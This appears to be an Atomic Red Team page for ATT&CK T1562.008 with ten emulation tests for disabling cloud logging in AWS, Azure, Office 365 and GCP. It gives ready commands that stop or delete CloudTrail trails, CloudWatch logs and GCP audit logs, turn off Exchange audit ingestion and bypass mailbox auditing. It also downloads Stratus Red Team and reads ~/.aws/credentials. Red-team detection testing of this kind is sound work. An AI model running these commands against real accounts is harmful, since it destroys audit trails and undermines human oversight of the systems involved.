T1562.008
Impair Defenses: Disable Cloud Logs
Description from ATT&CK
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the
cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)1
Set-MailboxAuditBypassAssociation
Atomic Tests
Atomic Test #1 - AWS - CloudTrail Changes
Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail
Supported Platforms: iaas:aws
auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
cloudtrail_name | Name of the cloudTrail | string | redatomictesttrail |
s3_bucket_name | Name of the bucket | string | redatomic-test |
region | Name of the region | string | us-east-1 |
Attack Commands: Run with sh!
1
2
3
aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}
aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
Cleanup Commands:
1
2
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
terraform destroy -auto-approve
Dependencies: Run with sh!
Description: Check if ~/.aws/credentials file has a default stanza is configured
Check Prereq Commands:
1
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
1
echo Please install the aws-cli and configure your AWS default profile using: aws configure
Description: Check if terraform is installed.
Check Prereq Commands:
1
terraform version
Get Prereq Commands:
1
echo Please install the terraform and configure your aws default profile
Description: Check if the dependency resources are already present.
Check Prereq Commands:
1
if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
3
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
terraform init
terraform apply -auto-approve
Atomic Test #2 - Azure - Eventhub Deletion
Identifies an Event Hub deletion in Azure. An Event Hub is an event processing service that ingests and processes large volumes of events and data. An adversary may delete an Event Hub in an attempt to evade detection. https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
Supported Platforms: iaas:azure
auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
username | Azure username | string | None |
password | Azure password | string | None |
event_hub_name | Name of the eventhub | string | test_eventhub |
resource_group | Name of the resource group | string | None |
name_space_name | Name of the NameSpace | string | None |
Attack Commands: Run with powershell!
1
2
3
4
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-AzureAD -Credential $creds
Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
Cleanup Commands:
1
2
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
terraform destroy -auto-approve
Dependencies: Run with powershell!
Description: Install-Module -Name Az
Check Prereq Commands:
1
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
Get Prereq Commands:
1
Install-Module -Name AzureAD -Force
Description: Check if terraform is installed.
Check Prereq Commands:
1
terraform version
Get Prereq Commands:
1
echo Please install the terraform.
Description: Check if the user is logged into Azure.
Check Prereq Commands:
1
az account show
Get Prereq Commands:
1
echo Configure your Azure account using: az login.
Description: Create dependency resources using terraform
Check Prereq Commands:
1
try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1}
Get Prereq Commands:
1
2
3
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
terraform init
terraform apply -auto-approve
Atomic Test #3 - Office 365 - Exchange Audit Log Disabled
You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox. Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline. https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml
Supported Platforms: office-365
auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
username | office-365 username | string | None |
password | office-365 password | string | None |
Attack Commands: Run with powershell!
1
2
3
4
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False
Cleanup Commands:
1
2
3
4
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True
Dependencies: Run with powershell!
Description: ExchangeOnlineManagement PowerShell module must be installed
Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
Atomic Test #4 - AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
Supported Platforms: linux,macos,iaas:aws
auto_generated_guid: a27418de-bdce-4ebd-b655-38f11142bf0c
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src |
aws_region | AWS region to detonate | string | us-west-2 |
Attack Commands: Run with sh!
1
2
3
4
5
6
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-event-selectors
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-event-selectors --force
Cleanup Commands:
1
2
3
4
5
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
Dependencies: Run with sh!
Description: Stratus binary must be present at the (#{stratus_path}/stratus)
Check Prereq Commands:
1
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
3
4
5
6
7
8
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
Description: Check if ~/.aws/credentials file has a default stanza is configured
Check Prereq Commands:
1
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
1
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
Atomic Test #5 - AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus
This Atomic test will use the Stratus Red Team will first setup a CloudTrail logging into an S3 bucket and will then make an API call to update the lifecycle rule on that S3 bucket with an expiration date of 1 day. This will essentially delete all the logs after one day. Adversaries often do this actiivity to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
Supported Platforms: linux,macos,iaas:aws
auto_generated_guid: 22d89a2f-d475-4895-b2d4-68626d49c029
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src |
aws_region | AWS region to detonate | string | us-west-2 |
Attack Commands: Run with sh!
1
2
3
4
5
6
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule
echo "starting detonate"
./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule --force
Cleanup Commands:
1
2
3
4
5
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
Dependencies: Run with sh!
Description: Stratus binary must be present at the (#{stratus_path}/stratus)
Check Prereq Commands:
1
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
3
4
5
6
7
8
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
Description: Check if ~/.aws/credentials file has a default stanza is configured
Check Prereq Commands:
1
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
1
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
Atomic Test #6 - AWS - Remove VPC Flow Logs using Stratus
This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
Supported Platforms: linux,macos,iaas:aws
auto_generated_guid: 93c150f5-ad7b-4ee3-8992-df06dec2ac79
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1562.008/src |
aws_region | AWS region to detonate | string | us-west-2 |
Attack Commands: Run with sh!
1
2
3
4
5
6
export AWS_REGION=#{aws_region}
cd #{stratus_path}
echo "starting warmup"
./stratus warmup aws.defense-evasion.vpc-remove-flow-logs
echo "starting detonate"
./stratus detonate aws.defense-evasion.vpc-remove-flow-logs --force
Cleanup Commands:
1
2
3
4
5
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
Dependencies: Run with sh!
Description: Stratus binary must be present at the (#{stratus_path}/stratus)
Check Prereq Commands:
1
if [ -f #{stratus_path}/stratus ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
2
3
4
5
6
7
8
if [ "$(uname)" == "Darwin" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
elif [ "$(expr substr $(uname) 1 5)" == "Linux" ]
then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep linux_x86_64 | cut -d '"' -f 4)
wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
fi
Description: Check if ~/.aws/credentials file has a default stanza is configured
Check Prereq Commands:
1
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
1
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
Atomic Test #7 - AWS - CloudWatch Log Group Deletes
Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
Supported Platforms: iaas:aws
auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
cloudwatch_log_group_name | Name of the cloudWatch log group | string | log-test |
region | Name of the region | string | us-east-1 |
Attack Commands: Run with sh!
1
2
3
4
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
Dependencies: Run with sh!
Description: Check if ~/.aws/credentials file has a default stanza is configured
Check Prereq Commands:
1
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
1
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
Atomic Test #8 - AWS CloudWatch Log Stream Deletes
Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html
Supported Platforms: iaas:aws
auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
cloudwatch_log_group_name | Name of the cloudWatch log group | string | test-logs |
cloudwatch_log_stream_name | Name of the cloudWatch log stream | string | 20150601 |
region | Name of the region | string | us-west-2 |
Attack Commands: Run with sh!
1
2
3
4
5
6
7
8
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
echo "*** Log Stream Created ***"
aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name}
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
Dependencies: Run with sh!
Description: Check if ~/.aws/credentials file has a default stanza is configured
Check Prereq Commands:
1
cat ~/.aws/credentials | grep "default"
Get Prereq Commands:
1
echo Please install the aws-cli and configure your AWS defult profile using: aws configure
Atomic Test #9 - Office 365 - Set Audit Bypass For a Mailbox
Use Exchange Management Shell to Mailbox auditing to bypass. It will prevent any mailbox audit logging entries being generated for the target e-mail box. https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps
Supported Platforms: office-365
auto_generated_guid: c9a2f6fe-7197-488c-af6d-10c782121ca6
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
username | office-365 username | string | o365_user_test |
password | office-365 password | string | o365_password_test |
target_email | office-365 target_email | string | o365_email_test |
Attack Commands: Run with powershell!
1
2
3
4
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $true
Cleanup Commands:
1
2
3
4
5
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $false
Disconnect-ExchangeOnline -Confirm:$false
Dependencies: Run with powershell!
Description: ExchangeOnlineManagement PowerShell module must be installed
Check Prereq Commands:
1
2
3
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Get Prereq Commands:
1
2
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
Atomic Test #10 - GCP - Delete Activity Event Log
GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data Access, System Events, and Policy Denied. An adversary may attempt to delete logs in order to hide their activity. However, Admin Activity, System Events, and Policy Deny events logs cannot be deleted.
This Atomic attempts to delete the Activity Event log. An event is generated under the method name of
with a Serverity of 1
google.logging.v2.LoggingServiceV2.DeleteLog
.1
ERROR
Supported Platforms: iaas:gcp
auto_generated_guid: d56152ec-01d9-42a2-877c-aac1f6ebe8e6
Inputs:
Name | Description | Type | Default Value |
---|---|---|---|
project-id | ID of the GCP Project you to execute the command against. | string | atomic-project-1 |
Attack Commands: Run with sh!
1
2
gcloud config set project #{project-id}
gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet
Dependencies: Run with sh!
Description: Requires gcloud
Check Prereq Commands:
1
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
Description: Check if user is logged in
Check Prereq Commands:
1
gcloud config get-value account
Get Prereq Commands:
1
gcloud auth login --no-launch-browser